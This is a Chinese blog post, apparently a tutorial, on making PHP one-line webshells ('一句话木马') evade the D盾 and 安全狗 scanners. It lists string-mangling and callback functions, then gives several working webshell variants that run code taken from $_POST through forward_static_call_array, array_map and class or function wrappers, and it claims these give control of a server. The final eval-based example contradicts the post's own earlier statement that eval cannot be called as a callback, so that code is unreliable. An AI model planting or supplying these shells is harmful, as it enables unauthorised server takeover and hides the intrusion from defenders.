一句话木马绕过D盾查杀
关于eval函数
eval是⼀个语⾔构造器⽽不是⼀个函数,不能被可变函数 调⽤可变函数:通过⼀个变量,获取其对
应的变量值,然后通过给该值增加⼀个括号(),让系统认为该值是⼀个函数,从⽽当做函数来执⾏
通俗的说⽐如你<?php$a=eval;$a()?>这样是不⾏的.也造就了⽤eval的话达不到assert的灵活,但是在php7.1以上assert已经不能使用了。
关于assert函数
assert()回调函数在构建⾃动测试套件的时候尤其有⽤,因为它们允许你简易地捕获传⼊断⾔的代码,并包含断⾔的位置信息。当信息能够被其他⽅法捕获,使⽤断⾔可以让它更快更⽅便!
PHP免杀函数-字符串变形
字符串变形多数用于 BYPASS 安全狗,相当对于 D 盾,安全狗更加重视 ”形“. 一个特殊的变形就能绕过安全狗,看看 PHP 手册,有着很多关于操作字符串的函数
ucwords() //函数把字符串中每个单词的首字符转换为大写。
ucfirst() //函数把字符串中的首字符转换为大写。
trim() //函数从字符串的两端删除空白字符和其他预定义字符。
substr_replace() //函数把字符串的一部分替换为另一个字符串
substr() //函数返回字符串的一部分。
strtr() //函数转换字符串中特定的字符。
strtoupper() //函数把字符串转换为大写。
strtolower() //函数把字符串转换为小写。
strtok() //函数把字符串分割为更小的字符串
str_rot13() //函数对字符串执行 ROT13 编码。
PHP免杀函数-回调函数
call_user_func_array()
call_user_func()
array_filter()
array_walk()
array_map()
registregister_shutdown_function()
register_tick_function()
filter_var()
filter_var_array()
uasort()
uksort()
array_reduce()
array_walk()
array_walk_recursive()
回调函数大部分已经被安全软件加入全家桶套餐 所以找到
一个生僻的不常用的回调函数来执行 比如
<?php
forward_static_call_array(assert,array($_POST[x]));
?>
PHP免杀函数-回调函数变形
前面说过众多回调函数已经被加入豪华套
餐了,怎么绕过呢,其实也很简单 那就是
定义个函数 或者类来调用
定义一个函数
<?php
function test($a,$b){
array_map($a,$b);
}
test(assert,array($_POST['x']));
?>
定义一个类
<?php
class loveme {
var $a;
var $b;
function __construct($a,$b) {
$this->a=$a;
$this->b=$b;
}
function test() {
array_map($this->a,$this->b);
}
}
$p1=new loveme(assert,array($_POST['x']));
$p1->test();
?>
例如
<?php eval($_POST['x'])?>对这一句话木马去进行变形,绕过D盾查杀,利用phpinfo()这个函数来验证是否成功。
此时我们可以输入下面的代码,使上面的木马进行变形,这个代码的作用就是可以让你接触到服务器,然后获得服务器的控制权,就等于完成了渗透操作
<?php
function test($a,$b){
array_map($a,$b);
}
test(eval,array($_POST['x']));
phpinfo();
?>
此时我们再用D盾查杀一下,发现绕过成功
编写人:Kevin 2023.7.29 标签:function,函数,查杀,assert,test,木马,字符串,绕过,array From: https://www.cnblogs.com/fitfit/p/17589855.html